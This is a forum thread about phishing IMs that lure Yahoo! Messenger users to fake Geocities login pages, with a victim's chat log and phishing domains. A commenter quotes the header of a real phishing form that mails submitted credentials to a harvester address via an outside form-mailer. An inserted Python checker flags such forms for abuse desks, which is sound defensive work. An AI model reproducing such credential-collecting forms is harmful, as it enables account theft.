Phishing in Yahoo! Geocities?
Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing anything to counter these attacks."
For those of you who are bored, you could try to get any of the addresses listed in the web form taken down.
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
I'm sure Google would have a fun time going after whoever referred havinfunfun@gmail.com.
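An added example, not from the thread or any of its posters: a small Python check that an abuse desk or hosting provider could run over hosted pages to flag forms like the one quoted above, where a login form posts to a form-to-mail script on another host. The `<FORM>` header lines are copied from the comment; the page URL and the login/password inputs in the sample are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []  # one dict per <form>: action, hidden inputs, password flag
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases tag and attribute names
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "hidden": {}, "password": False})
        elif tag == "input" and self.forms:
            form, kind = self.forms[-1], a.get("type", "text").lower()
            if kind == "hidden":
                form["hidden"][a.get("name", "")] = a.get("value", "")
            elif kind == "password":
                form["password"] = True

def audit_page(page_url, html):
    """Return a list of (action_host, reasons) for forms that look like credential collectors."""
    parser = FormAudit()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        # Resolve relative actions against the page URL before comparing hosts.
        action_host = urlparse(urljoin(page_url, form["action"])).hostname
        reasons = []
        if form["password"] and action_host != page_host:
            reasons.append("password field posts to a different host")
        mail_fields = sorted(n for n, v in form["hidden"].items() if "@" in v)
        if mail_fields:
            reasons.append("hidden field carries an e-mail address: " + ", ".join(mail_fields))
        if reasons:
            findings.append((action_host, reasons))
    return findings

# Constructed sample: the form header quoted above, plus login inputs and a page URL invented here.
SAMPLE_URL = "http://www.geocities.com/constructed-example/"
SAMPLE_HTML = """
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="text" NAME="login"><INPUT TYPE="password" NAME="passwd">
</FORM>
"""

if __name__ == "__main__":
    print(audit_page(SAMPLE_URL, SAMPLE_HTML))
```

A login form whose action resolves to the same host as the page, with no e-mail address in its hidden fields, produces no finding.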
Yahoo! has huge security problems with their accounts. So does Hotmail. I'm not going to get into the details, but let me say this. For my friends and family who forgot their password to their Yahoo! account, it's fairly easy to get their account back for them.
Yup, I was a victim of this YM phishing because of my dumb user error. Here's my story...
:(
I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):
Session Start (ant:onion): Sat Jan 07 02:28:11 2006
[02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/
[02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
[03:03] ant: I don't see anything even after logging in.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
Session Close (onion): Sat Jan 07 03:07:05 2006
I thought YM servers went down or something. In the daytime, it hit me. I got phished! My password was already changed (duh!).
I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal data in online accounts like Y!, nor do I remember it. Plus, I signed up for my account like a decade ago.
My buddies on the contact list (had a local backup copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.
I continued to e-mail Y!, but got nowhere. I eventually gave up and told them to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies to fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.
Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
www.my-photo-albums.tk
www.myphoto-album.tk
I was glad I didn't use my Yahoo account for anything other than IM and launch.com. I hate these bundled services within a single account like Passport.
As you can see, this is social engineering at its best, even on people who know computers. I fell for it.
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).